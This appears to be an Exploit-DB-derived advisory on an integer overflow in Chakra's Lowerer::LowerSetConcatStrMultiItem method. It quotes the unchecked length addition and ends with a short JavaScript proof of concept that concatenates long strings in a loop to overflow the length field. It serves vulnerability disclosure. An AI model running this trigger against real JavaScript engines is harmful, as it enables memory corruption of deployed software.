Integer Overflow in Lowerer::LowerSetConcatStrMultiItem Method

vendor:

Chakra

by:

Anonymous

7.5

CVSS

HIGH

Integer Overflow

190

CWE

Product Name: Chakra

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows

2020

Integer Overflow in Lowerer::LowerSetConcatStrMultiItem Method

The method Lowerer::LowerSetConcatStrMultiItem is used to generate machine code to concatenate strings. At (a), there's no check for integer overflow. Chakra uses string chains to handle concatenated strings(the ConcatString class). So it doesn't require much memory to trigger the bug. The proof of concept code creates a string of length 0x10000 and then concatenates it with a string of length 0x10000, resulting in an integer overflow.

Mitigation:

The vendor should implement checks for integer overflow in the Lowerer::LowerSetConcatStrMultiItem method.

Source

Exploit-DB raw data:

/*
The method "Lowerer::LowerSetConcatStrMultiItem" is used to generate machine code to concatenate strings.
Here's a snippet of the method.
void Lowerer::LowerSetConcatStrMultiItem(IR::Instr * instr)
{
    ...
    IR::IndirOpnd * dstLength = IR::IndirOpnd::New(concatStrOpnd, Js::ConcatStringMulti::GetOffsetOfcharLength(), TyUint32, func);
    ...
    InsertAdd(false, dstLength, dstLength, srcLength, instr); <<------ (a)
    ...
}

At (a), there's no check for integer overflow.

Note: Chakra uses string chains to handle concatenated strings(the ConcatString class). So it doesn't require much memory to trigger the bug.

PoC:
*/

let a = '';
let b = 'A'.repeat(0x10000);
for (let i = 0; i < 0x10000; i++) {
    a = 'BBBBBBBBB' + a + b;
}

print(a.length);
print(b.length);
print(a[0]);